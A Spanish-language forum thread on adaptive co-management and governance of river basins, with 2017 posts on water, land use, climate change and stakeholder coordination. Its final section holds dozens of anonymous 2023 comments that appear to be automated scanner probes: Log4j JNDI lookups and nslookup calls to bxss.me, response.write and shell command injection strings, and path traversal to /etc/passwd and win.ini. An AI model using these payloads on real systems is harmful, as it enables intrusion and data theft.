« Volver al Foro

GOBERNANZA DE UNA CUENCA HIDROGRÁFICA

¿Qué aspectos considera relevantes para desarrollar un modelo de cogestión adaptativa para la sostenibilidad ambiental de las cuencas hidrográficas?

Teniendo en cuenta que:

Cogestión adaptativa es la estructura de gestión a largo plazo que permite que los distintos actores compartan la responsabilidad de la gestión y aprendan de sus acciones, evaluando y revisando los mecanismos institucionales y el conocimiento ecológico en un proceso continúo de ensayo basado en el acierto y error (Martin-López B, et al. 2012) y

Gobernanza el ejercicio de autoridad política, económica y administrativa para manejar los asuntos de la nación. Es un complejo de mecanismos, procesos, relaciones e instituciones por medio de las cuales los ciudadanos y los grupos articulan sus intereses, ejercen sus derechos y obligaciones y median sus diferencias (PNUD).
Escrito por Cesar zuluaga arbelaez en Octubre 17 de 2017 En lo económico es necesario cerrar brechas tan importantes como es el acceso y tenencia de la tierra, la competitividad (vías de acceso), la intermediación de los productos agrícola, el fomento y promoción del sector y la elasticidad de los precios, estos aspectos complejizan la gobernabilidad ambiental, que busca la estabilidad social.
Escrito por José Eduardo Carrizosa en Octubre 17 de 2017 Los aspectos relevantes a considerar son la evaluación, la planificación y la gestión. Donde con una evaluación integrada de los aspectos socio-culturales, económicos y biofísicos se identifiquen las prioridades y oportunidades para el desarrollo de estrategias, para la implementación de una Cogestión Adaptativa con un sistema de gobernanza basado en la diversidad y redundancia institucional. Todo esto dentro de un marco donde los actores sociales estén informados, implicados y empoderados teniendo en cuenta la resiliencia y vulnerabilidad del estado del sistema socio-ecológico.
Escrito por Jorge Beltran en Octubre 18 de 2017 Considero necesarios los siguientes aspectos:
1. La definición del eje articulador (agua), como fundamento del proceso planificador, sobre el que recae el interés de los actores y sobre el que se medirá el impacto de las acciones colectivas que se planifiquen.
2. Una definición de los actores y sus competencias.
3. Una agenda de acción y/o ejecución compartida: esta deberá tener la capacidad de poner a interactuar a todos los actores, según sus deberes, obligaciones e intereses.
4. La definición de los mecanismos de financiación que permitan poner en marcha el plan de cogestión.
5. El trabajo en equipo: fundamental dado que cogestión, involucra la interacción de actores (locales, regionales y nacionales, tanto de orden público como privado).
Recomiendo leer: Modelo de cogestión adaptativa de cuencas hidrográficas. Propuesta conceptual basada en la revisión crítica de las experiencias en Honduras y Nicaragua. Hans Kammerbauer1; Josué León1; Nestor Castellón1; Sonia Gómez1; Jorge Faustino1; Cornelis Prins2. http://orton.catie.ac.cr/repdoc/A7413E/A7413E.PDF
Escrito por Sandra Salinas en Octubre 18 de 2017 Uno de los aspectos relevantes que se debe tener en cuenta es el cambio climático o/y la variabilidad climática. Teniendo en cuenta que la adaptación al cambio climático es un tema relativamente nuevo, se puede considerar que la adaptabilidad es la habilidad de ajustarse al cambio para modelar o mitigar los daños posibles o enfrentar las consecuencias.

Existen mecanismos para la implementación de medidas de adaptación y mitigación global que se exponen en la Convención Marco de las Naciones Unidas sobre Cambio Climático y el Protocolo de Kyoto, los cuales proponen mitigar las concentraciones de gases de efecto invernadero (GEI). Estos mecanismos deberían permitir la adaptación a los sistemas de vida amenazados por los cambios irreversibles que seguirán produciéndose hasta que logren estabilizar los niveles de dichos gases a nivel de cuenca hidrográfica.
Escrito por Oscar Francisco Molina Vanegas en Octubre 18 de 2017 Como bien dice el tema del foro, el factor principal es el recurso hidrografico, es decir, el agua y todos los agentes que la rodean. Este recurso tanto superficial (ríos, quebradas, arroyos) como subterraneo (acuiferos) son la base para todas las actividades economicas de la cuenca, desde la mas basica hasta la mas tecnificada. Por eso, en mi concepto todos los planes, proyectos y propuestas sociales y economicas deben girar en torno al recurso agua, claro esta, de la mano de otros items igual de relevantes como son el uso del suelo y el factor humano que los interviene a ambos (suelo y agua).
Escrito por Juan Carlos Cubides Medina en Octubre 18 de 2017 Teniendo en cuenta que uno de los recursos importantes para el desarrollo de la vida, es el agua, es también de reconocer que el recurso aire y la calidad del aire también lo es, así como el suelo y la calidad del suelo, el cual es necesario para el desarrollo de las diferentes actividades ya sean de orden productivo o contemplativo dentro de las diferentes áreas que integran las cuencas hidrográficas, derivado de esto se hace necesario la participación colectiva de todos aquellos quienes integran una cuenca definida, describiendo así sus diferentes actividades dentro de esta y evaluando a futuro los distintos impactos que se pueden causar además del constante planeamiento de las metodologías para la mitigación de dichos impactos, eso nos permite proyectar el comportamiento a futuro de la cuenca, además es necesario tener en cuenta como factor importante los efectos del cambio climático que pueden afectar la cuenca entrelazados con los fenómenos de riesgo, todo enmarcado bajo las diferentes actividades productivas, esto nos da una visión del comportamiento integral de la cuenca a futuro junto con la sociedad que de ella depende.
Escrito por Graciela Garzón en Octubre 24 de 2017 Teniendo en cuenta las dinámicas sociales bajo el marco cambiante en términos ambientales, parte de esa cogestión, es el aporte de los conceptos técnicos enmarcados en la aplicabilidad de éstos, integrando el territorio geomorfológicamente y analizando las variables que intervienen en la modelación de los escenarios, que es la directriz para hablar de ordenación, estos modelos permiten orientar el accionar de cada actor en el territorio y que exista un coordinación integral para hacer uso del mismo.
Escrito por David Sotelo en Octubre 24 de 2017 Como aporte a la herramienta de cogestión, es completamente necesario incluir el tema alrededor de la generación de Tecnologías Productivas de Adaptación al Cambio Climático, donde se le brinden herramientas concretas e implementables a los principales actores de la cuenca, los cuales correspoden a la comunidad que habita y vive el territorio. La planificación del territorio debe tener como eje transversal la Cultura Ambiental a través de la enseñanza de practicas ambientales y sustentables que le generen economía traducida en Calidad de Vida a las comunidades.
Escrito por luis francisco melo leal en Octubre 30 de 2017 Cualquier territorio al que vayamos, aunque sea el desierto, está seccionado por cuencas hidrográficas; son tan importantes, que estamos parados en una cuenca, vivimos y nos desenvolvemos en una y no la vemos. Es la unidad geográfica por excelencia para llevar a cabo los estudios hidrológicos. He llegado a pensar que los límites político-administrativos debieron haberse establecido totalmente a partir de los límites de las cuencas hidrográficas
Escrito por Cesar zuluaga arbelaez en Noviembre 06 de 2017 Que es más relevante el ordenamiento desde el territorio para el bienestar de las personas ó el ordenamiento desde el agua para el bienestar de los ecosistemas ¿
Escrito por Jorge Alejandro Rodriguez Beltran en Noviembre 15 de 2017 Una de las condiciones necesarias e importantes que se deben tener en cuenta para el desarrollo de un modelo de congestión son los mecanismos de convergencia entre los principales actores y grupos de interés en espacios de concertación, ya que son los espacios donde se pueden identificar los problemas mas relevantes y los conflictos latentes, para así trata de encontrar soluciones, con el fin de evitar que la mala planeación del componente hídrico y de otros sectores, como los territoriales, los de concepciones erróneas sobre los recursos hídricos, usos indiscriminados y de apropiación inadecuado del recurso se conviertan en un riesgo potencial afectando de manera directa al cambio climático.
Escrito por cristian javier castro fandiño en Noviembre 16 de 2017 Pienso que las acciones necesarias para la adaptación de un modelo de cogestión adaptativa para el manejo de cuencas hidrográficas debería ocuparse de
la gestión de los recursos naturales en el contexto de los sistemas productivos presentes y las instituciones sociales que reglamentan el acceso y la tenencia de dichos recursos. Las opiniones locales sobre estas cuestiones deben recopilarse y, cuando sea conveniente, compararse con conocimientos científicos pertinentes y orientaciones normativas. De esta manera, la investigación-acción puede promover un proceso de aprendizaje transcultural, bidireccional, a través del cual el conocimiento experto se adapta a las condiciones ambientales y socioculturales locales, a la vez que el conocimiento local se enriquece y fortalece mediante el conocimiento científico.
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 1BnqMeHhQSO
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 ${j${::-n}di:dns${::-:}//hitfujmkurggbdcdaf${::-.}bxss.me}zzzz
Escrito por en Marzo 29 de 2023 response.write(9799604*9595323)
Escrito por en Marzo 29 de 2023 ?????'"><&;|${${lower:j}${::-n}d${upper:?}:dns${::-:}//hitqenrghxpna39ead${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Escrito por en Marzo 29 de 2023 '+response.write(9799604*9595323)+'
Escrito por en Marzo 29 de 2023 ${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-16825..d411a${::-.}1${::-.}bxss.me}}
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 "+response.write(9799604*9595323)+"
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 J6yOcHq7
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 echo ynfvaw$()\ flvcbf\nz^xyu||a #' &echo ynfvaw$()\ flvcbf\nz^xyu||a #|" &echo ynfvaw$()\ flvcbf\nz^xyu||a #
Escrito por en Marzo 29 de 2023 ../../../../../../../../../../../../../../etc/passwd
Escrito por en Marzo 29 de 2023 &echo ilcpay$()\ zzyiat\nz^xyu||a #' &echo ilcpay$()\ zzyiat\nz^xyu||a #|" &echo ilcpay$()\ zzyiat\nz^xyu||a #
Escrito por en Marzo 29 de 2023 ../../../../../../../../../../../../../../windows/win.ini
Escrito por en Marzo 29 de 2023 |echo dkjykl$()\ imnkkl\nz^xyu||a #' |echo dkjykl$()\ imnkkl\nz^xyu||a #|" |echo dkjykl$()\ imnkkl\nz^xyu||a #
Escrito por en Marzo 29 de 2023 555
Escrito por en Marzo 29 de 2023 (nslookup hitnyaexcvvso76a55.bxss.me||perl -e "gethostbyname('hitnyaexcvvso76a55.bxss.me')")
Escrito por en Marzo 29 de 2023 ../555

Ingrese un comentario a este tema

Para ingresar un comentario a este tema debe ser un usuario registrado. Ingrese o Regístrese.